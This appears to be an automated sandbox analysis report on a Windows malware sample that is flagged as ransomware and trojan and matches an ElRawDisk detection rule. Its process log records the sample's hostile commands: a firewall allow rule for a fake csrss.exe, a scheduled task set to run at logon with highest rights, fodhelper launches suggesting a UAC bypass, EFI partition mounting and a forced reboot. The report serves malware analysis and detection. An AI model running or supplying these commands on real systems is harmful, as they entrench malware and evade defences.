Source: 31.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.1dyvctHqv1.exe.5e340e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9a56e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.2.1dyvctHqv1.exe.9ad2e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.1dyvctHqv1.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.2.1dyvctHqv1.exe.574a8d0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.2.1dyvctHqv1.exe.5744f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.1dyvctHqv1.exe.5e3bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.1dyvctHqv1.exe.558a8d0.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.1dyvctHqv1.exe.5e39a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.1dyvctHqv1.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.3.1dyvctHqv1.exe.5ffbce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.3.csrss.exe.6559a80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.1dyvctHqv1.exe.5584f30.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.2.1dyvctHqv1.exe.9ab080.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 33.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.2.csrss.exe.9a56e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.3.1dyvctHqv1.exe.5ff9a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

File created: C:\Windows\rss

Jump to behavior

Source: C:\Windows\rss\csrss.exe

Code function: String function: 0042C330 appears 36 times

Source: bootx64.efi.17.dr	Static PE information: No import functions for PE file found
Source: EfiGuardDxe.efi.17.dr	Static PE information: No import functions for PE file found
Source: bootmgfw.efi.17.dr	Static PE information: No import functions for PE file found

Source: 1dyvctHqv1.exe	Binary or memory string: OriginalFilename vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamesymsrv.dllj% vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameHamakaze.exe( vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedsefix.exe. vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe	Binary or memory string: OriginalFilename vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesymsrv.dllj% vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedsefix.exe. vs 1dyvctHqv1.exe
Source: 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameHamakaze.exe( vs 1dyvctHqv1.exe

Source: 1dyvctHqv1.exe

Static PE information: invalid certificate

Source: 1dyvctHqv1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@78/18@12/5

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: 1dyvctHqv1.exe

Virustotal: Detection: 19%

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

File read: C:\Users\user\Desktop\1dyvctHqv1.exe

Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1dyvctHqv1.exe "C:\Users\user\Desktop\1dyvctHqv1.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Users\user\Desktop\1dyvctHqv1.exe C:\Users\user\Desktop\1dyvctHqv1.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: unknown	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: unknown	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
